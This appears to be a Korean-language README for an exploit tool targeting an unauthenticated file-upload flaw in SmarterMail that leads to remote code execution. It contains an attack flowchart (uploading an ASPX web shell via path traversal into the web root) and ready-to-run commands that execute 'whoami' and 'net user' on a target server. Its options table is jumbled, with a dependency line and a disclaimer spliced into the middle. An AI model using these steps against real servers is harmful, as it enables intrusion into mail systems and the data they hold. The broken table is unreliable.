
SmarterMail 인증 없는 임의 파일 업로드 원격 코드 실행 (RCE)
인증 없는 임의 파일 업로드로 원격 코드 실행이 가능한 치명적인 취약점입니다.
| 필드 | 값 |
|---|---|
| 제품 | SmarterMail |
| 영향받는 버전 | 빌드 9406 및 이전 버전 |
| CVSS | 10.0 (치명적) |
| 유형 | 임의 파일 업로드 |
| 벡터 | HTTP (인증 없음) |
| 영향 | 원격 코드 실행 |
flowchart LR
A[Attacker] --> B["Find Upload Endpoint"]
B --> C["/api/upload"]
C --> D["Upload ASPX Shell"]
D --> E["Path Traversal"]
E --> F["../wwwroot/"]
F --> G["Access Shell"]
G --> H["RCE as IIS User"]
이 취약점으로 인해 인증되지 않은 공격자는 서버의 임의 위치에 파일을 업로드할 수 있습니다. ASPX 웹쉘을 웹 루트에 업로드하여 코드 실행을 달성할 수 있습니다.
공격 단계:
python exploit.py https://mail.target.com
python exploit.py https://mail.target.com -c "whoami"
python exploit.py https://mail.target.com -c "net user"
| 플래그 | 설명 | 기본값 |
|---|---|---|
-c, --command | 실행할 명령 | none |
-t, --timeout | 요청 시간 초과 |
requests
승인된 보안 테스트 전용입니다.
| 30 |
--check-only | 활성 상태인지만 확인 | off |